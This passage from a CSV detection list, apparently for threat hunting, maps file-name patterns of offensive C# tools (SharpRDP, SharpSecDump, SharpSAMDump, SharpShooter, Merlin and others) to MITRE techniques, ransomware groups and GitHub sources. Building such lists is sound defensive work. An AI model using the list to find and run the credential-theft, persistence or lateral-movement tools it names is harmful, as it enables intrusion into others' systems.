"*\SharpPack-master*",".{0,1000}\\SharpPack\-master.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","18636"
"*\SharpPersistSD.cs*",".{0,1000}\\SharpPersistSD\.cs.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","N/A","10","1","87","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z","18637"
"*\SharpPersistSD.dll*",".{0,1000}\\SharpPersistSD\.dll.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","N/A","10","1","87","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z","18638"
"*\SharpPersistSD.sln*",".{0,1000}\\SharpPersistSD\.sln.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","N/A","10","1","87","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z","18639"
"*\sharppick.exe*",".{0,1000}\\sharppick\.exe.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","18640"
"*\SharpPrinter.exe*",".{0,1000}\\SharpPrinter\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18641"
"*\SharpPrinter.exe*",".{0,1000}\\SharpPrinter\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18642"
"*\sharprdp.exe*",".{0,1000}\\sharprdp\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","18643"
"*\SharpRDP.exe*",".{0,1000}\\SharpRDP\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18644"
"*\SharpRDP.exe*",".{0,1000}\\SharpRDP\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpRDP","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18645"
"*\SharpRDP.exe*",".{0,1000}\\SharpRDP\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18646"
"*\SharpRDP.exe*",".{0,1000}\\SharpRDP\.exe.{0,1000}","offensive_tool_keyword","SharpRDP","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpRDP","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18647"
"*\SharpRDP.pdb*",".{0,1000}\\SharpRDP\.pdb.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpRDP","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18648"
"*\SharpRDP.pdb*",".{0,1000}\\SharpRDP\.pdb.{0,1000}","offensive_tool_keyword","SharpRDP","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpRDP","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18649"
"*\SharpRDP\*",".{0,1000}\\SharpRDP\\.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","18650"
"*\SharpRDPHijack*",".{0,1000}\\SharpRDPHijack.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement","https://github.com/bohops/SharpRDPHijack","1","0","N/A","N/A","10","5","480","80","2024-11-28T06:08:58Z","2020-07-06T02:59:46Z","18651"
"*\SharpRDPThief\*",".{0,1000}\\SharpRDPThief\\.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","N/A","N/A","10","2","160","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z","18652"
"*\SharpReg.exe*",".{0,1000}\\SharpReg\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18653"
"*\SharpReg.exe*",".{0,1000}\\SharpReg\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18654"
"*\SharpRoast.exe*",".{0,1000}\\SharpRoast\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","18655"
"*\SharpRoast.json*",".{0,1000}\\SharpRoast\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","18656"
"*\SharpRODC.*",".{0,1000}\\SharpRODC\..{0,1000}","offensive_tool_keyword","SharpRODC","audit the security of read-only domain controllers","T1012 - T1482 - T1207 - T1208 - T1209 - T1212","TA0007 - TA0008 - TA0006","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpRODC","1","0","N/A","N/A","8","2","115","8","2023-11-27T12:41:52Z","2023-11-24T14:35:49Z","18657"
"*\SharpRODC\*",".{0,1000}\\SharpRODC\\.{0,1000}","offensive_tool_keyword","SharpRODC","audit the security of read-only domain controllers","T1012 - T1482 - T1207 - T1208 - T1209 - T1212","TA0007 - TA0008 - TA0006","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpRODC","1","0","N/A","N/A","8","2","115","8","2023-11-27T12:41:52Z","2023-11-24T14:35:49Z","18658"
"*\SharpSAMDump-main*",".{0,1000}\\SharpSAMDump\-main.{0,1000}","offensive_tool_keyword","SharpSAMDump","SAM dumping via the registry in C#/.NET","T1003.002 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/jojonas/SharpSAMDump","1","0","N/A","N/A","10","1","48","8","2025-01-16T07:08:58Z","2024-05-27T10:53:27Z","18659"
"*\SharpSC.exe*",".{0,1000}\\SharpSC\.exe.{0,1000}","offensive_tool_keyword","SharpSC",".NET assembly to interact with services. (included in powershell empire)","T1543.003","TA0003","N/A","N/A","Persistence","https://github.com/djhohnstein/SharpSC","1","0","N/A","N/A","8","1","40","6","2019-09-27T23:04:24Z","2019-09-24T21:05:38Z","18660"
"*\SharpSCCM.exe*",".{0,1000}\\SharpSCCM\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18661"
"*\SharpSCCM.exe*",".{0,1000}\\SharpSCCM\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSCCM","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18662"
"*\SharpSCCM.exe*",".{0,1000}\\SharpSCCM\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18663"
"*\SharpSCCM.exe*",".{0,1000}\\SharpSCCM\.exe.{0,1000}","offensive_tool_keyword","SharpSCCM","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSCCM","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18664"
"*\SharpSCCM-main*",".{0,1000}\\SharpSCCM\-main.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","18665"
"*\SharpSC-main*",".{0,1000}\\SharpSC\-main.{0,1000}","offensive_tool_keyword","SharpSC",".NET assembly to interact with services. (included in powershell empire)","T1543.003","TA0003","N/A","N/A","Persistence","https://github.com/djhohnstein/SharpSC","1","0","N/A","N/A","8","1","40","6","2019-09-27T23:04:24Z","2019-09-24T21:05:38Z","18666"
"*\SharpSCshell.exe*",".{0,1000}\\SharpSCshell\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18667"
"*\SharpSearch.exe*",".{0,1000}\\SharpSearch\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18668"
"*\SharpSearch.exe*",".{0,1000}\\SharpSearch\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18669"
"*\SharpSecDump.exe*",".{0,1000}\\SharpSecDump\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18670"
"*\SharpSecDump.exe*",".{0,1000}\\SharpSecDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18671"
"*\SharpShares.exe*",".{0,1000}\\SharpShares\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18672"
"*\SharpShares.exe*",".{0,1000}\\SharpShares\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18673"
"*\SharpShares.exe*",".{0,1000}\\SharpShares\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18674"
"*\SharpShares\*",".{0,1000}\\SharpShares\\.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","N/A","N/A","10","1","33","7","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z","18675"
"*\SharpShares-master*",".{0,1000}\\SharpShares\-master.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","N/A","N/A","10","1","33","7","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z","18676"
"*\SharpShooter.*",".{0,1000}\\SharpShooter\..{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","18677"
"*\sharpshooter.js*",".{0,1000}\\sharpshooter\.js.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","18678"
"*\sharpshooter.vba",".{0,1000}\\sharpshooter\.vba","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","18679"
"*\sharpshooter.vbs",".{0,1000}\\sharpshooter\.vbs","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","18680"
"*\SharpShooter-main*",".{0,1000}\\SharpShooter\-main.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","18681"
"*\sharpshooterv4.js*",".{0,1000}\\sharpshooterv4\.js.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","18682"
"*\sharpshooterv4.vba",".{0,1000}\\sharpshooterv4\.vba","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","18683"
"*\sharpshooterv4.vbs",".{0,1000}\\sharpshooterv4\.vbs","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","18684"
"*\Sharp-SMBExec.exe*",".{0,1000}\\Sharp\-SMBExec\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18685"
"*\Sharp-SMBExec.exe*",".{0,1000}\\Sharp\-SMBExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta - APT29 - APT20 - PowerPool","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18686"
"*\SharpSniper.exe*",".{0,1000}\\SharpSniper\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18687"
"*\SharpSniper.exe*",".{0,1000}\\SharpSniper\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18688"
"*\SharpSocksServerCore.dll*",".{0,1000}\\SharpSocksServerCore\.dll.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","N/A","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","18689"
